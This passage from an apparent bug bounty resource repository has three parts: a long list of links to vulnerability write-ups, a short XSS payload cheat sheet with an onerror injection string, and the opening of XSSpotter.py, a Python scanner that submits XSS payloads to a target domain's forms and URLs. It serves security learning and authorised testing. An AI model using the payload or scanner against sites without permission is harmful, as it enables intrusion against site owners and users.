passwords](https://labs.detectify.com/2016/07/27/how-i-made-lastpass-give-me-all-your-passwords/) by labsdetectify 110 | - [Steal Google Oauth in Microsoft](http://blog.intothesymmetry.com/2015/06/on-oauth-token-hijacks-for-fun-and.html) 111 | - [Steal FB Access Token](http://blog.intothesymmetry.com/2014/04/oauth-2-how-i-have-hacked-facebook.html) 112 | - [Paypal Access Token Leaked](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html?m=1) 113 | - [Steal FB Access Token](http://homakov.blogspot.sg/2013/02/hacking-facebook-with-oauth2-and-chrome.html) 114 | - [Appengine Cool Bug](https://proximasec.blogspot.hk/2017/02/a-tale-about-appengines-authentication.html) 115 | - [Slack post message real life experience](https://labs.detectify.com/2017/02/28/hacking-slack-using-postmessage-and-websocket-reconnect-to-steal-your-precious-token/) 116 | - [Bypass redirect_uri](http://nbsriharsha.blogspot.in/2016/04/oauth-20-redirection-bypass-cheat-sheet.html) by nbsriharsha 117 | - [Stealing Facebook Messenger nonce worth 15k](https://stephensclafani.com/2017/03/21/stealing-messenger-com-login-nonces/) 118 | - [Steal Oculus Nonce and Oauth Flow Bypass](https://medium.com/@lokeshdlk77/bypass-oauth-nonce-and-steal-oculus-response-code-faa9cc8d0d37) 119 | 120 | #### Google oauth bypass 121 | 122 | - [Bypassing Google Authentication on Periscope's Administration Panel](https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/) By Jack Whitton 123 | 124 | ### CSRF 125 | 126 | - [Messenger.com CSRF that show you the steps when you check for CSRF](https://whitton.io/articles/messenger-site-wide-csrf/) by Jack Whitton 127 | - [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack)](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) by Florian Courtial 128 | - [Hacking PayPal Accounts with one click (Patched)](http://yasserali.com/hacking-paypal-accounts-with-one-click/) by Yasser Ali 129 | - [Add tweet to collection CSRF](https://hackerone.com/reports/100820) by vijay kumar 130 | - [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd 131 | - [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani 132 | - [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones 133 | - [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) 134 | 135 | 136 | ### Remote Code Execution 137 | - [JDWP Remote Code Execution in PayPal](https://www.vulnerability-lab.com/get_content.php?id=1474) by Milan A Solanki 138 | - [XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers](http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution) by Reginaldo Silva 139 | - [How I Hacked Facebook, and Found Someone's Backdoor Script](http://devco.re/blog/2016/04/21/how-I-hacked-facebook-and-found-someones-backdoor-script-eng-ver/) by Orange Tsai 140 | - [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) by Orange Tsai 141 | - [uber.com may RCE by Flask Jinja2 Template Injection](https://hackerone.com/reports/125980) by Orange Tsai 142 | - [Yahoo Bug Bounty - *.login.yahoo.com Remote Code Execution](http://blog.orange.tw/2013/11/yahoo-bug-bounty-part-2-loginyahoocom.html) by Orange Tsai (Sorry its in Chinese Only) 143 | - [How we broke PHP, hacked Pornhub and earned $20,000](https://www.evonide.com/how-we-broke-php-hacked-pornhub-and-earned-20000-dollar/) by Ruslan Habalov 144 | - *Alert*, God-like Write-up, make sure you know what is ROP before clicking, which I don't =( 145 | - [RCE deal to tricky file upload](https://www.secgeek.net/bookfresh-vulnerability/) by secgeek 146 | - [WordPress SOME bug in plupload.flash.swf leading to RCE in Automatic](https://hackerone.com/reports/134738) by Cure53 (cure53) 147 | - [Read-Only user can execute arbitraty shell commands on AirOS](https://hackerone.com/reports/128750) by 93c08539 (93c08539) 148 | - [Remote Code Execution by impage upload!](https://hackerone.com/reports/158148) by Raz0r (ru_raz0r) 149 | - [Popping a shell on the Oculus developer portal](https://bitquark.co.uk/blog/2014/08/31/popping_a_shell_on_the_oculus_developer_portal) by Bitquark 150 | - [Crazy! PornHub RCE AGAIN!!! How I hacked Pornhub for fun and profit - 10,000$](https://5haked.blogspot.sg/) by 5haked 151 | - [PayPal Node.js code injection (RCE)](http://artsploit.blogspot.hk/2016/08/pprce2.html) by Michael Stepankin 152 | - [eBay PHP Parameter Injection lead to RCE](http://secalert.net/#ebay-rce-ccs) 153 | - [Yahoo Acqusition RCE](https://seanmelia.files.wordpress.com/2016/02/yahoo-remote-code-execution-cms1.pdf) 154 | - [Command Injection Vulnerability in Hostinger](http://elladodelnovato.blogspot.hk/2017/02/command-injection-vulnerability-in.html?spref=tw&m=1) by @alberto__segura 155 | - [RCE in Airbnb by Ruby Injection](http://buer.haus/2017/03/13/airbnb-ruby-on-rails-string-interpolation-led-to-remote-code-execution/) by buerRCE 156 | - [RCE in Imgur by Command Line](https://hackerone.com/reports/212696) 157 | - [RCE in git.imgur.com by abusing out dated software](https://hackerone.com/reports/206227) by Orange Tsai 158 | - [RCE in Disclosure](https://hackerone.com/reports/213558) 159 | - [Remote Code Execution by struct2 Yahoo Server](https://medium.com/@th3g3nt3l/how-i-got-5500-from-yahoo-for-rce-92fffb7145e6) 160 | - [Command Injection in Yahoo Acquisition](http://samcurry.net/how-i-couldve-taken-over-the-production-server-of-a-yahoo-acquisition-through-command-injection/) 161 | - [Paypal RCE](http://blog.pentestbegins.com/2017/07/21/hacking-into-paypal-server-remote-code-execution-2017/) 162 | - [$50k RCE in JetBrains IDE](http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/) 163 | - [$20k RCE in Jenkin Instance](http://nahamsec.com/secure-your-jenkins-instance-or-hackers-will-force-you-to/) by @nahamsec 164 | - [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) 165 | - [Telekom.de Remote Command Execution!](http://www.sec-down.com/wordpress/?p=581) by Ebrahim Hegazy 166 | - [Magento Remote Code Execution Vulnerability!](http://www.sec-down.com/wordpress/?p=578) by Ebrahim Hegazy 167 | - [Yahoo! Remote Command Execution Vulnerability](http://www.sec-down.com/wordpress/?p=87) by Ebrahim Hegazy 168 | 169 | 170 | #### Deserialization 171 | - [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin 172 | - [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg 173 | - [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) 174 | - [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals 175 | 176 | #### Image Tragick 177 | - [Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition)](http://nahamsec.com/exploiting-imagemagick-on-yahoo/) by NaHamSec 178 | - [Exploting ImageMagick to get RCE on HackerOne](https://hackerone.com/reports/135072) by c666a323be94d57 179 | - [Trello bug bounty: Access server's files using ImageTragick](https://hethical.io/trello-bug-bounty-access-servers-files-using-imagetragick/) by Florian Courtial 180 | - [40k fb rce](4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html) 181 | - [Yahoo Bleed 1](https://scarybeastsecurity.blogspot.hk/2017/05/bleed-continues-18-byte-file-14k-bounty.html) 182 | - [Yahoo Bleed 2](https://scarybeastsecurity.blogspot.hk/2017/05/bleed-more-powerful-dumping-yahoo.html) 183 | 184 | ### Direct Object Reference (IDOR) 185 | - [Trello bug bounty: The websocket receives data when a public company creates a team visible board](https://hethical.io/trello-bug-bounty-the-websocket-receives-data-when-a-public-company-creates-a-team-visible-board/) by Florian Courtial 186 | - [Trello bug bounty: Payments informations are sent to the webhook when a team changes its visibility](https://hethical.io/trello-bug-bounty-payments-informations-are-sent-to-the-webhook-when-a-team-changes-its-visibility/) by Florian Courtial 187 | - [Change any user's password in Uber](https://hackerone.com/reports/143717) by mongo 188 | - [Vulnerability in Youtube allowed moving comments from any video to another](https://www.secgeek.net/youtube-vulnerability/) by secgeek 189 | - It's *Google* Vulnerability, so it's worth reading, as generally it is more difficult to find Google vulnerability 190 | - [Twitter Vulnerability Could 191 | Credit Cards from Any Twitter Account](https://www.secgeek.net/twitter-vulnerability/) by secgeek 192 | - [One Vulnerability allowed deleting comments of any user in all Yahoo sites](https://www.secgeek.net/yahoo-comments-vulnerability/) by secgeek 193 | - [Microsoft-careers.com Remote Password Reset](http://yasserali.com/microsoft-careers-com-remote-password-reset/) by Yaaser Ali 194 | - [How I could change your eBay password](http://yasserali.com/how-i-could-change-your-ebay-password/) by Yaaser Ali 195 | - [Duo Security Researchers Uncover Bypass of PayPal’s Two-Factor Authentication](https://duo.com/blog/duo-security-researchers-uncover-bypass-of-paypal-s-two-factor-authentication) by Duo Labs 196 | - [Hacking Facebook.com/thanks Posting on behalf of your friends! 197 | ](http://www.anandpraka.sh/2014/11/hacking-facebookcomthanks-posting-on.html) by Anand Prakash 198 | - [How I got access to millions of [redacted] accounts](https://bitquark.co.uk/blog/2016/02/09/how_i_got_access_to_millions_of_redacted_accounts) 199 | - [All Vimeo Private videos disclosure via Authorization Bypass with Excellent Technical Description](https://hackerone.com/reports/137502) by Enguerran Gillier (opnsec) 200 | - [Urgent: attacker can access every data source on Bime](https://hackerone.com/reports/149907) by Jobert Abma (jobert) 201 | - [Downloading password protected / restricted videos on Vimeo](https://hackerone.com/reports/145467) by Gazza (gazza) 202 | - [Get organization info base on uuid in Uber](https://hackerone.com/reports/151465) by Severus (severus) 203 | - [How I Exposed your Primary Facebook Email Address (Bug worth $4500)](http://roy-castillo.blogspot.hk/2013/07/how-i-exposed-your-primary-facebook.html) by Roy Castillo 204 | - [DOB disclosed using “Facebook Graph API Reverse Engineering”](https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71#.9gbtbv42q) by Raja Sekar Durairaj 205 | - [Change the description of a video without publish_actions permission in Facebook](http://philippeharewood.com/change-the-description-of-a-video-without-publish_actions-permission/) by phwd 206 | - [Response To Request Injection (RTRI)](https://www.bugbountyhq.com/front/latestnews/dWRWR0thQ2ZWOFN5cTE1cXQrSFZmUT09/) by ?, be honest, thanks to this article, I have found quite a few bugs because of using his method, respect to the author! 207 | - [Leak of all project names and all user names , even across applications on Harvest](https://hackerone.com/reports/152696) by Edgar Boda-Majer (eboda) 208 | - [Changing paymentProfileUuid when booking a trip allows free rides at Uber](https://hackerone.com/reports/162809) by Matthew Temmy (temmyscript) 209 | - [View private tweet](https://hackerone.com/reports/174721) 210 | - [Uber Enum UUID](http://www.rohk.xyz/uber-uuid/) 211 | - [Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User](http://stephensclafani.com/2014/07/08/hacking-facebooks-legacy-api-part-1-making-calls-on-behalf-of-any-user/) by Stephen Sclafani 212 | - [Hacking Facebook’s Legacy API, Part 2: Stealing User Sessions](http://stephensclafani.com/2014/07/29/hacking-facebooks-legacy-api-part-2-stealing-user-sessions/) by Stephen Sclafani 213 | - [Delete FB Video](https://danmelamed.blogspot.hk/2017/01/facebook-vulnerability-delete-any-video.html) 214 | - [Delete FB Video](https://pranavhivarekar.in/2016/06/23/facebooks-bug-delete-any-video-from-facebook/) 215 | - [Facebook Page Takeover by Manipulating the Parameter](http://arunsureshkumar.me/index.php/2016/09/16/facebook-page-takeover-zero-day-vulnerability/) by arunsureshkumar 216 | - [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) 217 | - [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec 218 | - [Classic IDOR endpoints in Twitter](http://www.anandpraka.sh/2017/05/how-i-took-control-of-your-twitter.html) 219 | - [Mass Assignment, Response to Request Injection, Admin Escalation](https://seanmelia.wordpress.com/2017/06/01/privilege-escalation-in-a-django-application/) by sean 220 | - [Getting any Facebook user's friend list and partial payment card details](https://www.josipfranjkovic.com/blog/facebook-friendlist-paymentcard-leak) 221 | - [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) 222 | 223 | 224 | ### XXE 225 | - [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) by detectify 226 | - [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht 227 | - [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) 228 | - [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 229 | - [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) 230 | 231 | ### Unrestricted File Upload 232 | - [File Upload XSS in image uploading of App in mopub](https://hackerone.com/reports/97672) by vijay kumar 233 | - [RCE deal to tricky file upload](https://www.secgeek.net/bookfresh-vulnerability/) by secgeek 234 | - [File Upload XSS in image uploading of App in mopub in Twitter](https://hackerone.com/reports/97672) by vijay kumar (vijay_kumar1110) 235 | 236 | ### Server Side Request Forgery (SSRF) 237 | - [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus 238 | - [SSRF to pivot internal network](https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf) 239 | - [SSRF to LFI](https://seanmelia.wordpress.com/2015/12/23/various-server-side-request-forgery-issues/) 240 | - [SSRF to query google internal server](https://www.rcesecurity.com/2017/03/ok-google-give-me-all-your-internal-dns-information/) 241 | - [SSRF by using third party Open redirect](https://buer.haus/2017/03/09/airbnb-chaining-third-party-open-redirect-into-server-side-request-forgery-ssrf-via-liveperson-chat/) by Brett BUERHAUS 242 | - [SSRF tips from BugBountyHQ of Images](https://twitter.com/BugBountyHQ/status/868242771617792000) 243 | - [SSRF to RCE](http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html) 244 | - [XXE at Twitter](https://hackerone.com/reports/248668) 245 | - [Blog post: Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface ](http://blog.portswigger.net/2017/07/cracking-lens-targeting-https-hidden.html) 246 | - [Plotly AWS Metadata SSRF (and a stored XSS)](https://ysx.me.uk/a-pair-of-plotly-bugs-stored-xss-and-aws-metadata-ssrf/) 247 | 248 | ### Race Condition 249 | 250 | - [Race conditions on Facebook, DigitalOcean and others (fixed)](http://josipfranjkovic.blogspot.hk/2015/04/race-conditions-on-facebook.html) by Josip Franjković 251 | - [Race Conditions in Popular reports feature in HackerOne](https://hackerone.com/reports/146845) by Fábio Pires (shmoo) 252 | - [Hacking Starbuck for unlimited money](https://sakurity.com/blog/2015/05/21/starbucks.html) by Egor Homakov 253 | 254 | ### Business Logic Flaw 255 | - [How I Could Steal Money from Instagram, Google and Microsoft](https://www.arneswinnen.net/2016/07/how-i-could-steal-money-from-instagram-google-and-microsoft/) by Arne Swinnen 256 | - [How I could have removed all your Facebook notes](http://www.anandpraka.sh/2015/12/summary-this-blog-post-is-about.html) 257 | - [Facebook - bypass ads account's roles vulnerability 2015](http://blog.darabi.me/2015/03/facebook-bypass-ads-account-roles.html) by POUYA DARABI 258 | - [Uber Ride for Free](http://www.anandpraka.sh/2017/03/how-anyone-could-have-used-uber-to-ride.html) by anand praka 259 | - [Uber Eat for Free](https://t.co/MCOM7j2dWX) by 260 | 261 | ### Authentication Bypass 262 | - [OneLogin authentication bypass on WordPress sites via XMLRPC in Uber](https://hackerone.com/reports/138869) by Jouko Pynnönen (jouko) 263 | - [2FA PayPal Bypass](https://henryhoggard.co.uk/blog/Paypal-2FA-Bypass) by henryhoggard 264 | - [SAML Bug in Github worth 15000](http://www.economyofmechanism.com/github-saml.html) 265 | - [Authentication bypass on Airbnb via OAuth tokens theft](https://www.arneswinnen.net/2017/06/authentication-bypass-on-airbnb-via-oauth-tokens-theft/) 266 | - [Uber Login CSRF + Open Redirect -> Account Takeover at Uber](http://ngailong.com/uber-login-csrf-open-redirect-account-takeover/) 267 | - [Administrative Panel Access](http://c0rni3sm.blogspot.hk/2017/08/accidentally-typo-to-bypass.html?m=1) by c0rni3sm 268 | - [Uber Bug Bounty: Gaining Access To An Internal Chat System](http://blog.mish.re/index.php/2017/09/06/uber-bug-bounty-gaining-access-to-an-internal-chat-system/) by mishre 269 | - [Flickr Oauth Misconfiguration](https://mishresec.wordpress.com/2017/10/12/yahoo-bug-bounty-exploiting-oauth-misconfiguration-to-takeover-flickr-accounts/) by mishre 270 | - [Slack SAML authentication bypass](http://blog.intothesymmetry.com/2017/10/slack-saml-authentication-bypass.html) by Antonio Sanso 271 | - [Shopify admin authentication bypass using partners.shopify.com](https://hackerone.com/reports/270981) by uzsunny 272 | 273 | ### HTTP Header Injection 274 | - [Twitter Overflow Trilogy in Twitter](https://blog.innerht.ml/overflow-trilogy/) by filedescriptor 275 | - [Twitter CRLF](https://blog.innerht.ml/twitter-crlf-injection/) by filedescriptor 276 | - [Adblock Plus and (a little) more in Google](https://adblockplus.org/blog/finding-security-issues-in-a-website-or-how-to-get-paid-by-google) 277 | - [$10k host header](https://sites.google.com/site/testsitehacking/10k-host-header) by Ezequiel Pereira 278 | 279 | ### Subdomain Takeover 280 | 281 | - [Hijacking tons of Instapage expired users Domains & Subdomains](http://www.geekboy.ninja/blog/hijacking-tons-of-instapage-expired-users-domains-subdomains/) by geekboy 282 | - [Reading Emails in Uber Subdomains](https://hackerone.com/reports/156536) 283 | - [Slack Bug Journey](http://secalert.net/slack-security-bug-bounty.html) - by David Vieira-Kurz 284 | - [Subdomain takeover and chain it to perform authentication bypass](https://www.arneswinnen.net/2017/06/authentication-bypass-on-ubers-sso-via-subdomain-takeover/) by Arne Swinnen 285 | - [Hacker.One Subdomain Takeover](https://hackerone.com/reports/159156) - by geekboy 286 | 287 | ### Author Write Up 288 | 289 | - [Payment Flaw in Yahoo](http://ngailong.com/abusing-multistage-logic-flaw-to-buy-anything-for-free-at-hk-deals-yahoo-com/) 290 | - [Bypassing Google Email Domain Check to Deliver Spam Email on Google’s Behalf](http://ngailong.com/bypassing-google-email-domain-check-to-deliver-spam-email-on-googles-behalf/) 291 | - [When Server Side Request Forgery combine with Cross Site Scripting](http://ngailong.com/what-could-happen-when-server-side-request-forgery-combine-with-cross-site-scripting/) 292 | 293 | 294 | ## XSSI 295 | 296 | - [Plain Text Reading by XSSI](http://balpha.de/2013/02/plain-text-considered-harmful-a-cross-domain-exploit/) 297 | - [JSON hijacking](http://blog.portswigger.net/2016/11/json-hijacking-for-modern-web.html) 298 | - [OWASP XSSI](https://www.owasp.org/images/f/f3/Your_Script_in_My_Page_What_Could_Possibly_Go_Wrong_-_Sebastian_Lekies%2BBen_Stock.pdf) 299 | - [Japan Identifier based XSSI attacks](http://www.mbsd.jp/Whitepaper/xssi.pdf) 300 | - [JSON Hijack Slide](https://www.owasp.org/images/6/6a/OWASPLondon20161124_JSON_Hijacking_Gareth_Heyes.pdf) 301 | 302 | ## Email Related 303 | 304 | - [This domain is my domain - G Suite A record vulnerability](http://blog.pentestnepal.tech/post/156959105292/this-domain-is-my-domain-g-suite-a-record) 305 | - [I got emails - G Suite Vulnerability](http://blog.pentestnepal.tech/post/156707088037/i-got-emails-g-suite-vulnerability) 306 | - [How I snooped into your private Slack messages [Slack Bug bounty worth $2,500]](http://blog.pentestnepal.tech/post/150381068912/how-i-snooped-into-your-private-slack-messages) 307 | - [Reading Uber’s Internal Emails [Uber Bug Bounty report worth $10,000]](http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty) 308 | - [Slack Yammer Takeover by using TicketTrick](https://medium.com/@intideceukelaire/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c) by Inti De Ceukelaire 309 | - [How I could have mass uploaded from every Flickr account!](https://ret2got.wordpress.com/2017/10/05/how-i-could-have-mass-uploaded-from-every-flickr-account/) 310 | 311 | ## Money Stealing 312 | 313 | - [Round error issue -> produce money for free in Bitcoin Site](https://hackerone.com/reports/176461) by 4lemon 314 | 315 | ## 2017 Local File Inclusion 316 | 317 | - [Disclosure Local File Inclusion by Symlink](https://hackerone.com/reports/213558) 318 | - [Facebook Symlink Local File Inclusion](http://josipfranjkovic.blogspot.hk/2014/12/reading-local-files-from-facebooks.html) 319 | - [Gitlab Symlink Local File Inclusion](https://hackerone.com/reports/158330) 320 | - [Gitlab Symlink Local File Inclusion Part II](https://hackerone.com/reports/178152) 321 | - [Multiple Company LFI](http://panchocosil.blogspot.sg/2017/05/one-cloud-based-local-file-inclusion.html) 322 | - [LFI by video conversion, excited about this trick!](https://hackerone.com/reports/226756) 323 | 324 | ## Miscellaneous 325 | 326 | - [SAML Pen Test Good Paper](http://research.aurainfosec.io/bypassing-saml20-SSO/) 327 | - [A list of FB writeup collected by phwd](https://www.facebook.com/notes/phwd/facebook-bug-bounties/707217202701640) by phwd 328 | - [NoSQL Injection](http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) by websecurify 329 | - [CORS in action](http://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) 330 | - [CORS in Fb messenger](http://www.cynet.com/blog-facebook-originull/) 331 | - [Web App Methodologies](https://blog.zsec.uk/ltr101-method-to-madness/) 332 | - [XXE Cheatsheet](https://www.silentrobots.com/blog/2015/12/14/xe-cheatsheet-update/) 333 | - [The road to hell is paved with SAML Assertions, Microsoft Vulnerability](http://www.economyofmechanism.com/office365-authbypass.html#office365-authbypass) 334 | - [Study this if you like to learn Mongo SQL Injection](https://cirw.in/blog/hash-injection) by cirw 335 | - [Mongo DB Injection again](http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) by websecrify 336 | - [w3af speech about modern vulnerability](https://www.youtube.com/watch?v=GNU0_Uzyvl0) by w3af 337 | - [Web cache attack that lead to account takeover](http://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html) 338 | - [A talk to teach you how to use SAML Raider](https://www.usenix.org/conference/usenixsecurity12/technical-sessions/presentation/somorovsky) 339 | - [XSS Checklist when you have no idea how to exploit the bug](http://d3adend.org/xss/ghettoBypass) 340 | - [CTF write up, Great for Bug Bounty](https://ctftime.org/writeups?tags=web200&hidden-tags=web%2cweb100%2cweb200) 341 | - [It turns out every site uses jquery mobile with Open Redirect is vulnerable to XSS](http://sirdarckcat.blogspot.com/2017/02/unpatched-0day-jquery-mobile-xss.html) by sirdarckcat 342 | - [Bypass CSP by using google-analytics](https://hackerone.com/reports/199779) 343 | - [Payment Issue with Paypal](https://hackerone.com/reports/219215) 344 | - [Browser Exploitation in Chinese](http://paper.seebug.org/) 345 | - [XSS bypass filter](https://t.co/0Kpzo52ycb) 346 | - [Markup Impropose Sanitization](https://github.com/ChALkeR/notes/blob/master/Improper-markup-sanitization.md) 347 | - [Breaking XSS mitigations via Script Gadget](https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf) 348 | - [X41 Browser Security White Paper](https://browser-security.x41-dsec.de/X41-Browser-Security-White-Paper.pdf) 349 | - [Bug Bounty Cheatsheets](https://github.com/EdOverflow/bugbounty-cheatsheet) By EdOverflow 350 | - [Messing with the Google Buganizer System for $15,600 in Bounties](https://medium.freecodecamp.org/messing-with-the-google-buganizer-system-for-15-600-in-bounties-58f86cc9f9a5) 351 | - [Electron Security White Paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf) 352 | - [Twitter's Vine Source code dump - $10080](https://avicoder.me/2016/07/22/Twitter-Vine-Source-code-dump/) 353 | - [SAML Bible](https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/) 354 | - [Bypassing Google’s authentication to access their Internal Admin panels — Vishnu Prasad P G](https://medium.com/bugbountywriteup/bypassing-googles-fix-to-access-their-internal-admin-panels-12acd3d821e3) 355 | - [Smart Contract Vulnerabilities](http://www.dasp.co/) 356 | -------------------------------------------------------------------------------- /XSS_payloads.md: -------------------------------------------------------------------------------- 1 | ``` 2 | Try url/?testtest // check in source for testtest 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | "><img src=# onerror=prompt(1231231);> 16 | 17 | // Custom HTML tag 18 | #testxss 19 | 20 | If reflected between tags, even if your input if inside any kind of quotes, you can try to inject and escape from this context. then 21 | 22 | ``` 23 | -------------------------------------------------------------------------------- /XSSpotter.py: -------------------------------------------------------------------------------- 1 | ''' 2 | -- Version 0.2 -- 3 | ================================= 4 | Improvements made by Stephen Bray 5 | ================================= 6 | 7 | Built on top of the popular tool XssPy: 8 | XssPy - Finding XSS made easier 9 | Author: Faizan Ahmad (Fsecurify) 10 | Email: fsecurify@gmail.com 11 | ''' 12 | 13 | import mechanize 14 | import sys 15 | import os 16 | import httplib 17 | import argparse 18 | import logging 19 | import time 20 | import json 21 | 22 | import Cookie 23 | import cookielib 24 | from urlparse import urlparse 25 | 26 | br = mechanize.Browser() # initiating the browser 27 | br.addheaders = [ 28 | ('User-agent', 29 | 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11') 30 | ] 31 | br.set_handle_robots(False) 32 | br.set_handle_refresh(False) 33 | 34 | payloads = ['', '', ''] 35 | # Need to add payloads to test things like single tick 36 | urlpayloads = ['', '', ''] 37 | blacklist = ['.png', '.jpg', '.jpeg', '.mp3', '.mp4', '.avi', '.gif', '.svg', 38 | '.pdf'] 39 | 40 | # TOTAL CROSS SITE SCRIPTING FINDINGS 41 | xssLinks = [] 42 | highProbLinks = [] 43 | medProbLinks = [] 44 | lowProbLinks = [] 45 | 46 | class color: 47 | BLUE = '\033[94m' 48 | RED = '\033[91m' 49 | GREEN = '\033[92m' 50 | YELLOW = '\033[93m' 51 | BOLD = '\033[1m' 52 | END = '\033[0m' 53 | 54 | @staticmethod 55 | def log(lvl, col, msg): 56 | logger.log(lvl, col + msg + color.END) 57 | 58 | logger = logging.getLogger(__name__) 59 | lh = logging.StreamHandler() # Handler for the logger 60 | logger.addHandler(lh) 61 | formatter = logging.Formatter('[%(asctime)s] %(message)s', datefmt='%H:%M:%S') 62 | lh.setFormatter(formatter) 63 | 64 | parser = argparse.ArgumentParser() 65 | parser.add_argument('-u', action='store', dest='url', 66 | help='The URL to analyze (without http:// or https://)') 67 | parser.add_argument('-e', action='store_true', dest='compOn', 68 | help='Enable comprehensive scan') 69 | parser.add_argument('-v', action='store_true', dest='url_check', 70 | help='Add testing for xss in urls') 71 | parser.add_argument('-c', action='store', dest='cookies', 72 | help='A json formatted file that contains a list of cookies') 73 | results = parser.parse_args() 74 | 75 | #logger.setLevel(logging.DEBUG if results.verbose else logging.INFO) 76 | logger.setLevel(logging.INFO) 77 | domain = results.url 78 | 79 | # Live updates for user 80 | #\033[K clears a line and \x1b[2J\x1b[H refreshes the screen 81 | # Hacky as fuck and will probably break somehow 82 | def interface(status, curr_url, element, url_count, iteration): 83 | sys.stdout.flush() 84 | 85 | sys.stdout.write("\x1b[2J\x1b[H" + color.RED + "" 86 | " ____ ___ _________ __ __\n" 87 | " \ \/ / ______/ _____/_____ _____/ |__/ |_ ___________\n" 88 | " \ / / ___/\_____ \\\____ \ / _ \ __\ __\/ __ \_ __ \ \n" 89 | " / \ \___ \ / \ |_> X <_> ) | | | \ ___/| | \/\n" 90 | " /___/\ \/____ >_______ / __/ \____/|__| |__| \___ >__|\n" 91 | " \_/ \/ \/|__| \/\n" 92 | "|-------------------------------------------------\n" + color.END + "" 93 | "|\n" 94 | "|\033[K Domain or Subdomain to Scan: " + color.BLUE + domain + color.END + "\n" 95 | "|\033[K Status: " + color.GREEN + status + color.END + "\n" 96 | "|\033[K URLs to Test: " + color.GREEN + (str(url_count) if url_count > 0 else "N/A") + color.END + "\n" 97 | "|\033[K Percentage Completed: " + (color.YELLOW if url_count != iteration else color.GREEN) + (("{0:.1f}").format(100 * (iteration / float(url_count))) if iteration >= 0 else "N/A") + color.END + "\n" 98 | "|\033[K Current URL: " + color.BLUE + curr_url + color.END + "\n" 99 | "|\033[K Element: " + color.YELLOW + element + color.END + "\n" 100 | "|\033[K Vulnerabilities Found: " + (color.RED if len(xssLinks) > 0 else color.GREEN) + str(len(xssLinks)) + color.END + "\n" 101 | "|\033[K High: " + color.RED + str(len(highProbLinks)) + color.END + "\n" 102 | "|\033[K Medium: " + color.YELLOW + str(len(medProbLinks)) + color.END + "\n" 103 | "|\033[K Low: " + color.GREEN + str(len(lowProbLinks)) + color.END + "\n" 104 | "|\033[K Most Recent Vulnerable Link: " + color.BLUE + (xssLinks[len(xssLinks)-1] if len(xssLinks) >= 1 else "N/A") + color.END +"\n" 105 | "\n" 106 | ) 107 | 108 | # Sort the payload into different categories based on likleyhood of exploit 109 | # override to say that the payload is high 